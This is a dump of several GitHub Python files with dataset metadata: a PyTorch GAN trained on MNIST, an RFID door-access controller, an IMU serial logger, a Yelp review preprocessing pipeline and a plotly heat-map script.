layers.append(nn.BatchNorm1d(out_feat, 0.8))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n *block(opt.latent_dim, 128, normalize=False),\n *block(128, 256),\n *block(256, 512),\n *block(512, 1024),\n nn.Linear(1024, int(np.prod(img_shape))),\n nn.Tanh()\n )\n\n def forward(self, z):\n img = self.model(z)\n img = img.view(img.size(0), *img_shape)\n return img\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super(Discriminator, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear(int(np.prod(img_shape)), 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1),\n nn.Sigmoid(),\n )\n\n def forward(self, img):\n img_flat = img.view(img.size(0), -1)\n validity = self.model(img_flat)\n return validity\n\nadversarial_loss = torch.nn.BCELoss()\n\ngenerator = Generator()\ndiscriminator = Discriminator()\n\nif cuda:\n generator.cuda()\n discriminator.cuda()\n adversarial_loss.cuda()\n\nos.makedirs(\"data/mnist\", exist_ok=True)\ndataloader = torch.utils.data.DataLoader(\n datasets.MNIST(\"data/mnist\",\n train=True,\n download=True,\n transform=transforms.Compose(\n [transforms.Resize(opt.img_size), transforms.ToTensor(), transforms.Normalize([0.5], [0.5])]\n ),\n ),\n batch_size=opt.batch_size,\n shuffle=True,\n)\n\noptimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\noptimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nD_hist = []\nG_hist = []\n\nbound_min = ( 1, -1)\nbound_max = (-1, -1)\n\nplot = lp.LivePlot((800, 600))\n\ndef lerp(v0, v1, t):\n return v0 + t * (v1 - v0)\n\netqdm = tqdm.trange(opt.n_epochs)\nfor epoch in etqdm:\n btqdm = tqdm.tqdm(enumerate(dataloader), total=len(dataloader))\n for i, (imgs, _) in btqdm:\n valid = Variable(Tensor(imgs.size(0), 1).fill_(1.), requires_grad=False)\n fake = Variable(Tensor(imgs.size(0), 1).fill_(0.), requires_grad=False)\n\n real_imgs = Variable(imgs.type(Tensor))\n\n optimizer_G.zero_grad()\n z = Variable(Tensor(np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim))))\n gen_imgs = generator(z)\n g_loss = adversarial_loss(discriminator(gen_imgs), valid)\n g_loss.backward()\n optimizer_G.step()\n\n optimizer_D.zero_grad()\n real_loss = adversarial_loss(discriminator(real_imgs), 
valid)\n fake_loss = adversarial_loss(discriminator(gen_imgs.detach()), fake)\n d_loss = (real_loss + fake_loss) / 2\n d_loss.backward()\n optimizer_D.step()\n\n G_hist.append(g_loss.item())\n G_hist = G_hist[-800:]\n\n D_hist.append(d_loss.item())\n D_hist = D_hist[-800:]\n\n it = epoch * len(dataloader) + i\n mn = min(g_loss.item(), d_loss.item())\n mx = max(g_loss.item(), d_loss.item())\n\n local_min = min(np.min(G_hist), np.min(D_hist))\n local_min = lerp(bound_min[0], local_min, (it - bound_min[1]) / 8000)\n\n local_max = max(np.max(G_hist), np.max(D_hist))\n local_max = lerp(bound_max[0], local_max, (it - bound_max[1]) / 8000)\n\n if mn < local_min:\n bound_min = (mn, it)\n\n if mx > local_max:\n bound_max = (mx, it)\n\n if not plot.update([ D_hist, G_hist ], (local_min * 0.9, local_max * 1.05)):\n raise EarlyStop()\n\n btqdm.set_postfix({\n \"D loss\": d_loss.item(),\n \"G loss\": g_loss.item()\n })\n\n batches_done = epoch * len(dataloader) + i\n if batches_done % opt.sample_interval == 0:\n save_image(gen_imgs.data[:25], \"images/{}.png\".format(batches_done), nrow=5, normalize=True)\n\n\n\n", "repo_name": "rgd-ul-2020/public", "sub_path": "code/misc/machine_learning/main_torch.py", "file_name": "main_torch.py", "file_ext": "py", "file_size_in_byte": 5862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn.Tanh", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": 
"name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 95, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 95, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 98, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 98, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 99, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 99, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.cuda", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 109, "usage_type": "attribute"}, {"api_name": "liveplot.LivePlot", "line_number": 117, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 122, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 158, "usage_type": "call"}, {"api_name": "torchvision.utils.save_image", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "29923577338", "text": "import logging, datetime\nfrom time import sleep\nimport threading, traceback\n\n\ndoor_controller_mutex = threading.Lock()\nevent_log_mutex = threading.Lock()\n\nlogger = logging.getLogger('Controller')\n\nclass Event():\n @staticmethod\n def get_time():\n return datetime.datetime.now()\n\n class Id_Read():\n def __init__(self, id):\n self.id = id\n self.timestamp = Event.get_time()\n\n class Id_Access_Accepted():\n def __init__(self, id, server_positive_reply):\n self.id = id\n self.timestamp = Event.get_time()\n self.server_reply = server_positive_reply\n\n class Id_Access_Rejected():\n def __init__(self, id, 
server_negative_reply):\n self.id = id\n self.timestamp = Event.get_time()\n self.server_reply = server_negative_reply\n\n class Server_Timeout():\n def __init__(self, id):\n self.id = id\n self.timestamp = Event.get_time()\n\n class Id_Allowed_In_Disconnect_State():\n def __init__(self, id, server_reply):\n self.id = id\n self.timestamp = Event.get_time()\n self.server_reply = server_reply\n\n class Id_Read_While_Busy():\n def __init__(self, id):\n self.id = id\n self.timestamp = Event.get_time()\n\nclass Event_Recorder():\n def __init__(self):\n self.events = []\n def record(self, event):\n self.events.append(event)\n\n\nclass Controller:\n def __init__(self):\n self.communication = None\n self.lock = None\n self.reader = None\n\n self.event_recorder = Event_Recorder()\n\n def add_event(self, event):\n event_log_mutex.acquire(True) #blocking acquire\n try:\n self.event_recorder.events.append(event)\n finally:\n event_log_mutex.release()\n\n def log_events(self):\n pass\n\n def save_offline_access(self):\n pass\n\n def load_offline_access(self):\n pass\n\n #this method gets called (async) by the reader every time a card is read\n def read(self, id):\n try:\n #a mutex because we only want to process one read card at a time\n if door_controller_mutex.acquire(False): #non-blocking acquire\n try:\n logger.debug(\"ID {id} was read: processing\".format(**locals()))\n self.add_event(Event.Id_Read(id))\n\n # we ask the server if we should open the door for the id - if the server times out, we open it anyway and log that fact\n permission_request = self.communication.get_permission(id)\n\n if permission_request.valid:\n if permission_request.allow:\n self.add_event(Event.Id_Access_Accepted(id, permission_request))\n self.lock.open()\n else:\n self.add_event(Event.Id_Access_Rejected(id, permission_request))\n else:\n self.add_event(Event.Id_Allowed_In_Disconnect_State(id, permission_request))\n self.lock.open()\n\n finally:\n door_controller_mutex.release()\n else:\n self.add_event(Event.Id_Read_While_Busy(id))\n logger.debug(\"ID {id} was read but an earlier read is being processed\".format(**locals()))\n\n except Exception as e:\n trace_stack = traceback.format_exc()\n logger.critical(\"Unrecoverable error has occurred: {0}\".format(str(e)))\n logger.critical(\"{0}\".format(trace_stack))\n\n", "repo_name": "heliosmakerspace/accessctl", "sub_path": "access_control_rfid_agent/rfid_client/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 3517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "threading.Lock", "line_number": 6, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "traceback.format_exc", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "3067919300", "text": "import serial\nimport csv\nimport time\n\n# Initialize serial connection (this is an example, adjust for your IMU and connection)\nData = serial.Serial()\nData.baudrate = 19200\nData.port = '/dev/tty.usbmodem1101'\nData.timeout = 1\nData.open()\n\ndef dataProcess(data):\n data = str(data)\n dataSet = []\n datapoint = ''\n for i in data:\n if i.isdigit() or i == '-':\n datapoint += i\n elif i == \",\" and canFloat(datapoint):\n dataSet.append(float(datapoint))\n datapoint = ''\n return dataSet\n\ndef canFloat(data):\n try:\n float(data)\n 
return True\n except:\n return False\n# Function to read data from IMU\ndef read_imu_data():\n # if ser.in_waiting:\n line = Data.readline()\n # Parse the line into respective data fields\n # This will depend on the format of the data coming from the IMU\n data = dataProcess(line)\n return data\n # return None\n\n\nfor i in range(10):\n # Collect data\n data_list = []\n start_time = time.time()\n print(f\"Move{i}\")\n while len(data_list) <= 90:\n elapsed_time = time.time() - start_time\n # Ensure that we are collecting data over exactly 3 seconds\n data = read_imu_data()\n # print(data)\n if data:\n data_list.append(data)\n\n start_point = 151\n # Write to CSV file\n with open(f'data/imu_data_{start_point+i}.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['ax', 'ay', 'az', 'gx', 'gy', 'gz', 'row', 'pitch']) # Replace with your actual labels\n writer.writerows(data_list)\n\n with open(f'label/imu_label_{start_point+i}.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['label']) # Replace with your actual labels\n writer.writerow(['3'])", "repo_name": "GreatEugenius/InfinityDie", "sub_path": "DataAndModel/read_write_imu.py", "file_name": "read_write_imu.py", "file_ext": "py", "file_size_in_byte": 1814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "serial.Serial", "line_number": 6, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 57, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "26547759242", "text": "\"\"\"\nDataset preprocessing.\nAuthor: Ying Xu\nDate: Jul 8, 2020\n\"\"\"\n\nfrom __future__ import unicode_literals\nfrom argparse import ArgumentParser\n\nimport json\nfrom tqdm import tqdm\nfrom collections import Counter\nimport spacy\nnlp = spacy.blank(\"en\")\nGLOVE_WORD_SIZE = int(2.2e6)\nCF_WORD_SIZE = 65713\n\nparser = ArgumentParser()\nparser.add_argument('--data_dir', default='/Users/yxu132/Downloads/yelp_dataset', type=str, help='path to DATA_DIR')\nparser.add_argument('--embed_file', default='/Users/yxu132/pub-repos/decaNLP/embeddings/glove.840B.300d.txt', type=str, help='path to glove embedding file')\nparser.add_argument('--para_limit', default=50, type=int, help='maximum number of words for each paragraph')\nargs = parser.parse_args()\n\ndef parse_json():\n texts = []\n ratings = []\n for line in open(args.data_dir+'/yelp_academic_dataset_review.json', 'r'):\n # for line in open(args.data_dir + '/sample.json', 'r'):\n example = json.loads(line)\n texts.append(example['text'].replace('\\n', ' ').replace('\\r', ''))\n ratings.append(example['stars'])\n with open(args.data_dir+'/yelp_review.full', 'w') as output_file:\n output_file.write('\\n'.join(texts))\n with open(args.data_dir+'/yelp_review.ratings', 'w') as output_file:\n output_file.write('\\n'.join([str(rating) for rating in ratings]))\n\ndef readLinesList(filename):\n ret = []\n for line in open(filename, 'r'):\n ret.append(line.strip())\n return ret\n\ndef read_lines():\n ret = []\n labels = readLinesList(args.data_dir+'/yelp_review.ratings')\n for ind, line in tqdm(enumerate(open(args.data_dir+'/yelp_review.full', 'r'))):\n line = line.strip().lower()\n line = line.replace('\\\\n', ' ').replace('\\\\', '')\n line = line.replace('(', ' (').replace(')', ') ')\n line = 
line.replace('!', '! ')\n line = ' '.join(line.split())\n example = {}\n example['text'] = line\n example['label'] = labels[ind]\n ret.append(example)\n return ret\n\ndef get_tokenize(sent):\n sent = sent.replace(\n \"''\", '\" ').replace(\"``\", '\" ')\n doc = nlp(sent)\n context_tokens = [token.text for token in doc]\n new_sent = ' '.join(context_tokens)\n return new_sent, context_tokens\n\ndef tokenize_sentences(sentences, para_limit=None):\n print('Tokenize input sentences...')\n word_counter = Counter()\n context_list, context_tokens_list = [], []\n labels = []\n for sentence in tqdm(sentences):\n context, context_tokens = get_tokenize(sentence['text'])\n if len(context_tokens) > para_limit:\n continue\n for token in context_tokens:\n word_counter[token] += 1\n context_list.append(context)\n context_tokens_list.append(context_tokens)\n labels.append(sentence['label'])\n return context_list, context_tokens_list, labels, word_counter\n\ndef filter_against_embedding(sentences, counter, emb_file, limit=-1,\n size=GLOVE_WORD_SIZE, vec_size=300):\n\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n assert size is not None\n assert vec_size is not None\n with codecs.open(emb_file, \"r\", \"utf-8\") as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print(\"{} / {} tokens have corresponding embedding vector\".format(\n len(embedding_dict), len(filtered_elements)))\n\n embedding_tokens = set(embedding_dict.keys())\n filtered_sentences = []\n for sentence in sentences:\n tokens = sentence['text'].split()\n if len(set(tokens) - embedding_tokens) > 0:\n continue\n filtered_sentences.append(sentence)\n\n return filtered_sentences, embedding_dict\n\ndef writeLines(llist, output_file):\n with codecs.open(output_file, \"w\", \"utf-8\") as output:\n output.write('\\n'.join(llist))\n\ndef get_embedding(counter, data_type, emb_file, limit=-1, size=None, vec_size=None):\n print(\"Generating {} embedding...\".format(data_type))\n embedding_dict = {}\n\n filtered_elements = [k for k, v in counter.items() if v > limit]\n assert size is not None\n assert vec_size is not None\n with codecs.open(emb_file, \"r\", \"utf-8\") as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n missing_words = set(filtered_elements) - set(embedding_dict.keys())\n print('\\n'.join(missing_words))\n\n print(\"{} / {} tokens have corresponding {} embedding vector\".format(\n len(embedding_dict), len(filtered_elements), data_type))\n\n token2idx_dict = {token: idx for idx,\n token in enumerate(embedding_dict.keys(), 0)}\n\n idx2emb_dict = {idx: embedding_dict[token]\n for token, idx in token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\ndef embed_sentences(word_counter, word_emb_file):\n word_emb_mat, word2idx_dict = get_embedding(\n word_counter, \"word\", emb_file=word_emb_file, size=GLOVE_WORD_SIZE, vec_size=300)\n return word_emb_mat, word2idx_dict\n\ndef save(filename, obj, message=None):\n if message is not None:\n print(\"Saving {}...\".format(message))\n with open(filename, \"w\") as fh:\n json.dump(obj, fh)\n\nimport numpy as np\ndef process():\n\n 
print(\"Step 2.1: Tokenize sentences...\")\n sentences = read_lines()\n context_list, context_tokens_list, labels, word_counter = \\\n tokenize_sentences(sentences, para_limit=args.para_limit)\n writeLines(context_list, args.data_dir+'/yelp.in')\n writeLines(labels, args.data_dir+'/yelp.out')\n\n print(\"\\nStep 2.2: Filter dataset against glove embedding...\")\n texts = readLinesList(args.data_dir+'/yelp.in')\n labels = readLinesList(args.data_dir+'/yelp.out')\n sentences = []\n for ind, text in enumerate(texts):\n sentence = {}\n sentence['text'] = text\n sentence['label'] = labels[ind]\n sentences.append(sentence)\n print('\\nbefore filtering: '+str(len(sentences)))\n\n filtered_sentences, embed_dict = filter_against_embedding(sentences, word_counter, emb_file=args.embed_file)\n print('\\nafter filtering: '+str(len(filtered_sentences)))\n\n texts = [sentence['text'] for sentence in filtered_sentences]\n labels = [sentence['label'] for sentence in filtered_sentences]\n writeLines(texts, args.data_dir + '/yelp_filtered.in')\n writeLines(labels,args.data_dir + '/yelp_filtered.out')\n\n\n print(\"\\nStep 2.3: Split into train, dev and test datasets...\")\n dev_test_percentage = 0.05\n sentences = []\n texts = readLinesList(args.data_dir+'/yelp_filtered.in')\n labels = readLinesList(args.data_dir+'/yelp_filtered.out')\n for ind, text in enumerate(texts):\n sentence={}\n sentence['text'] = text\n sentence['label'] = labels[ind]\n sentences.append(sentence)\n sentences = np.array(sentences)\n\n total = len(sentences)\n dev_test_num = int(total * dev_test_percentage)\n dev = sentences[:dev_test_num]\n test = sentences[dev_test_num: dev_test_num*2]\n train = sentences[dev_test_num*2: ]\n\n writeLines([sent['text'] for sent in train], args.data_dir + '/yelp_train.in')\n writeLines([sent['text'] for sent in dev], args.data_dir + '/yelp_dev.in')\n writeLines([sent['text'] for sent in test], args.data_dir + '/yelp_test.in')\n writeLines([sent['label'] for sent in train], args.data_dir + '/yelp_train.out')\n writeLines([sent['label'] for sent in dev], args.data_dir + '/yelp_dev.out')\n writeLines([sent['label'] for sent in test], args.data_dir + '/yelp_test.out')\n\n print(\"Step 2.4: Extract embeddings for filtered sentence vocabs...\")\n\n sentences_tokens = [sent['text'].split() for sent in sentences]\n word_counter = dict()\n for sentence in sentences_tokens:\n for token in sentence:\n if token in word_counter:\n word_counter[token] = word_counter[token] + 1\n else:\n word_counter[token] = 1\n\n word_counter_new = sorted(word_counter.items(), key=lambda kv: (kv[1], kv[0]), reverse=True)\n\n vocab_output_file = codecs.open(args.data_dir + '/vocab_count.txt', \"w\", \"utf-8\")\n for word in word_counter_new:\n vocab_output_file.write(word[0]+' '+str(word[1])+'\\n')\n\n word_emb_mat, word2idx_dict = embed_sentences(word_counter, word_emb_file=args.embed_file)\n writeLines(word2idx_dict.keys(), args.data_dir + '/vocab.in')\n save(args.data_dir + '/emb.json', word_emb_mat, message=\"word embedding\")\n\ndef binarise_and_balance():\n partitions = ['train', 'dev', 'test']\n\n for partition in partitions:\n sentences = readLinesList(args.data_dir+'/yelp_'+partition+'.in')\n pos_sents, neg_sents = [], []\n for ind, line in enumerate(open(args.data_dir+'/yelp_'+partition+'.out', 'r')):\n if line.strip() == '1.0' or line.strip() == '2.0':\n neg_sents.append(sentences[ind])\n elif line.strip() == '4.0' or line.strip() == '5.0':\n pos_sents.append(sentences[ind])\n\n np.random.seed(0)\n shuffled_ids = 
np.arange(len(pos_sents))\n np.random.shuffle(shuffled_ids)\n pos_sents = np.array(pos_sents)[shuffled_ids]\n\n sents = neg_sents + pos_sents.tolist()[:len(neg_sents)]\n labels = ['1.0 0.0'] * len(neg_sents) + ['0.0 1.0'] * len(neg_sents)\n\n shuffled_ids = np.arange(len(sents))\n np.random.shuffle(shuffled_ids)\n sents = np.array(sents)[shuffled_ids]\n labels = np.array(labels)[shuffled_ids]\n\n with open(args.data_dir+'/'+partition+'.in', 'w') as output_file:\n for line in sents:\n output_file.write(line+'\\n')\n with open(args.data_dir+'/'+partition+'.out', 'w') as output_file:\n for line in labels:\n output_file.write(line+'\\n')\n\n\n###################### CF embedding ###################\n\nimport codecs\nimport os\n\ndef parse_cf_emb(cf_file_path):\n\n vocab = []\n matrix = []\n for line in tqdm(open(cf_file_path, 'r'), total=CF_WORD_SIZE):\n comps = line.strip().split()\n word = ''.join(comps[0:-300])\n vec = comps[-300:]\n vocab.append(word)\n matrix.append(vec)\n writeLines(vocab, 'embeddings/counter-fitted-vectors-vocab.txt')\n json.dump(matrix, open('embeddings/counter-fitted-vectors-emb.json', 'w'))\n\ndef transform_cf_emb():\n\n if not os.path.exists('embeddings/counter-fitted-vectors-vocab.txt') or \\\n not os.path.exists('embeddings/counter-fitted-vectors-emb.json'):\n parse_cf_emb('embeddings/counter-fitted-vectors.txt')\n\n\n vocab = readLinesList(args.data_dir + '/vocab.txt')\n cf_vocab = readLinesList('embeddings/counter-fitted-vectors-vocab.txt')\n\n print('glove_vocab_size: '+str(len(vocab)))\n print('cf_vocab_size: ' + str(len(cf_vocab)))\n\n with codecs.open(args.data_dir + '/emb.json', \"r\", \"utf-8\") as fh:\n emb = json.load(fh)\n\n with codecs.open('embeddings/counter-fitted-vectors-emb.json', \"r\", \"utf-8\") as fh:\n cf_emb = json.load(fh)\n\n vocab_diff = []\n vocab_diff_ind = []\n for ind, word in enumerate(vocab):\n if word not in cf_vocab:\n vocab_diff.append(word)\n vocab_diff_ind.append(ind)\n\n print('extend_vocab_size: ' + str(len(vocab_diff_ind)))\n\n\n new_cf_vocab = cf_vocab + vocab_diff\n new_emb = cf_emb\n for ind, word in enumerate(vocab_diff):\n new_emb.append(emb[vocab_diff_ind[ind]])\n\n print('combined_cf_vocab_size: ' + str(len(new_emb)))\n\n writeLines(new_cf_vocab, args.data_dir + '/cf_vocab.in')\n json.dump(new_emb, open(args.data_dir + '/cf_emb.json', 'w'))\n\ndef split_pos_neg():\n\n input_sents = readLinesList(args.data_dir+'/train.in')\n labels = readLinesList(args.data_dir+'/train.out')\n\n pos_out_file = open(args.data_dir+'/train.pos.in', 'w')\n neg_out_file = open(args.data_dir+'/train.neg.in', 'w')\n pos_lab_file = open(args.data_dir+'/train.pos.out', 'w')\n neg_lab_file = open(args.data_dir+'/train.neg.out', 'w')\n\n for ind, sent in enumerate(input_sents):\n label = labels[ind]\n if label == '1.0 0.0':\n neg_out_file.write(sent+'\\n')\n neg_lab_file.write(label+'\\n')\n elif label == '0.0 1.0':\n pos_out_file.write(sent + '\\n')\n pos_lab_file.write(label + '\\n')\n\n\nif __name__ == '__main__':\n print(\"Step 1: Parse json file...\")\n parse_json()\n print(\"\\nStep 2: Data partition/GloVe embedding extraction...\")\n process()\n print(\"\\nStep 3: Binarise and downsampling...\")\n binarise_and_balance()\n print(\"\\nStep 4: Counter-fitted embedding extraction...\")\n transform_cf_emb()\n print(\"\\nStep 5: Split train set into pos/neg examples (for conditional generation only)...\")\n split_pos_neg()\n\n\n", "repo_name": "ibm-aur-nlp/adv-def-text-dist", "sub_path": "yelp_preprocessing.py", "file_name": 
"yelp_preprocessing.py", "file_ext": "py", "file_size_in_byte": 13256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "spacy.blank", "line_number": 14, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 29, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 46, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 68, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 71, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 90, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 121, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 242, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 251, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 270, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 292, "usage_type": "call"}, {"api_name": "json.load", "line_number": 293, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 295, "usage_type": "call"}, {"api_name": "json.load", "line_number": 296, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 316, "usage_type": "call"}]} +{"seq_id": "18117915340", "text": "import plotly.graph_objects as go\nimport numpy as np\n\n\nfilename = 'dump/2020-12-14T01:28:14-14.csv'\nvalues = np.genfromtxt(filename, delimiter=',')\n\nfig = go.Figure(data=go.Volume(\n x=values[:, 0],\n y=values[:, 1],\n z=values[:, 2],\n value=values[:, 3],\n isomin=0,\n isomax=.01,\n opacity=.3, # needs to be small to see through all surfaces\n surface_count=10, # pick larger for good volume rendering\n )\n)\nfig.show()\n", "repo_name": "kostmetallist/hyperbolic-equation-solver", "sub_path": "dump/visualization/heat_map.py", "file_name": "heat_map.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.genfromtxt", "line_number": 6, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 8, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Volume", 
